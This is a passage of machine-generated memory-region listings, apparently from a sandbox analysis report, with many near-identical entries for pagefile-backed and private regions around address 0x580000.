region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10861 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10865 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10868 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10869 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10871 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10873 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10875 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10879 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10885 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10927 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10934 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10935 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10959 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10961 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10963 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10967 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10968 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10969 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10972 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10975 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10976 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10979 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10983 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10984 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10987 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10988 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10991 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10992 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10995 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10996 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10997 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10998 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10999 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11000 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11003 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11004 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11005 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11008 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11009 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11010 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11011 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11012 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11015 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11016 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11019 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11020 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11023 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11024 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11027 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11028 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11031 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11032 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11035 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11036 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11039 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11040 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11043 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11044 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11047 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11050 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11051 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11052 start_va = 0x580000 end_va = 